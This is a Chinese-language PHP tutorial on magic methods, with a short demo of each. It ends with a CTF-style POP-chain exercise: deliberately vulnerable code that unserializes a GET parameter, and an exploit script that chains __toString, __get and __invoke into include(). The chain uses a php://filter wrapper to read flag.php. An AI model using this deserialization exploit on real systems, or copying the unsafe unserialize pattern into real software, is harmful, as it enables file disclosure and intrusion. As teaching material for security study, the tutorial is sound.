php魔术方法
1.__construct(),类的构造函数
2.__destruct(),类的析构函数
3.__call(),在对象中调用一个不可访问方法时调用
4.__get(),获得一个类的成员变量时调用
5.__set(),设置一个类的成员变量时调用
6.__isset(),当对不可访问属性调用isset()或empty()时调用
7.__unset(),当对不可访问属性调用unset()时被调用。
8.__sleep(),执行serialize()时,先会调用这个函数
9.__wakeup(),执行unserialize()时,先会调用这个函数
10.__toString(),类被当成字符串时的回应方法
11.__invoke(),调用函数的方式调用一个对象时的回应方法
12.__clone(),当对象复制完成时调用
__construct()
1
2
3
4
5
6
7
8
9
10
| <?php
class BaseClass {
public $name;
function __construct($name) {
$this->name = $name;
}
}
$a = new BaseClass("ZQJ");
echo($a->name);
|
__destruct()
1
2
3
4
5
6
7
8
9
10
11
12
13
| <?php
class BaseClass {
public $name;
function __construct($name) {
$this->name = $name;
}
function __destruct() {
echo("该对象被销毁");
}
}
$a = new BaseClass("ZQJ ");
echo($a->name);
|
__call()
1
2
3
4
5
6
7
8
9
10
11
12
13
| <?php
class BaseClass {
public $name;
function __construct($name) {
$this->name = $name;
}
function __call($funName,$args) {
echo("该方法不存在:".$funName);
}
}
$a = new BaseClass("ZQJ");
$a->getFlag();
|
__get()
类的成员属性被设定为 private 后,如果我们试图在外面调用它则会出现“不能访问某个私有属性”的错误。那么为了解决这个问题,我们可以使用魔术方法 __get()。
1
2
3
4
5
6
7
8
9
10
11
12
13
| <?php
class BaseClass {
private $name;
function __construct($name) {
$this->name = $name;
}
function __get($name) {
return "No Permission";
}
}
$a = new BaseClass("ZQJ");
echo($a->name);
|
__set()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| <?php
class BaseClass {
private $name;
function __construct($name) {
$this->name = $name;
}
function __set($property, $value) {
$this->$property = $value;
}
function show() {
return $this->name;
}
}
$a = new BaseClass("ZQJ");
$a->name = "aaa";
echo($a->show());
|
__isset()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| <?php
class BaseClass {
public $id;
private $name;
function __construct($id,$name) {
$this->id = $id;
$this->name = $name;
}
function __isset($value) {
echo("no");
}
}
$a = new BaseClass(1,"ZQJ");
echo(isset($a->id));
echo(isset($a->name));
|
__sleep()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| <?php
class BaseClass1 {
public $name;
public $sex;
function __construct($name,$sex) {
$this->name = $name;
$this->sex = $sex;
}
}
class BaseClass2 {
public $name;
public $sex;
function __construct($name,$sex) {
$this->name = $name;
$this->sex = $sex;
}
function __sleep() {
return array('name');
}
}
$a = new BaseClass1("ZQJ","男");
$b = new BaseClass2("ZQJ","男");
echo(serialize($a));
echo(serialize($b));
|
__tostring()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| <?php
class BaseClass {
public $name;
public $sex;
function __construct($name,$sex) {
$this->name = $name;
$this->sex = $sex;
}
function __toString()
{
return "111";
}
}
$a = new BaseClass("ZQJ","男");
echo "$a";
|
__invoke()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| <?php
class BaseClass {
public $name;
public $sex;
function __construct($name,$sex) {
$this->name = $name;
$this->sex = $sex;
}
function __invoke()
{
echo "111";
}
}
$a = new BaseClass("ZQJ","男");
$a();
|
__clone()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| <?php
class BaseClass {
public $name;
public $sex;
function __construct($name,$sex) {
$this->name = $name;
$this->sex = $sex;
}
function __clone()
{
echo "111";
}
}
$a = new BaseClass("ZQJ","男");
$b = clone $a;
|
pop链构造例题
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
| Welcome to index.php
<?php
class Modifier {
protected $var;
public function append($value){
include($value);
}
public function __invoke(){
$this->append($this->var);
}
}
class Show{
public $source;
public $str;
public function __construct($file='index.php'){
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
public function __toString(){
return $this->str->source;
}
public function __wakeup(){
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
}
class Test{
public $p;
public function __construct(){
$this->p = array();
}
public function __get($key){
$function = $this->p;
return $function();
}
}
if(isset($_GET['pop'])){
@unserialize($_GET['pop']);
}
else{
$a=new Show;
highlight_file(__FILE__);
}
|
exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
| <?php
class Modifier {
protected $var = 'php://filter/read=convert.base64-encode/resource=flag.php';
}
class Show
{
public $source;
public $str;
public function __construct($file='index.php'){
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
public function __toString(){
return "aaa";
}
}
class Test{
public $p;
}
$a = new Show("index.php");
$b = new Test();
$c = new Modifier();
$b->p = $c;
$a->str = $b;
$d = new Show($a);
echo urlencode(serialize($d));
|
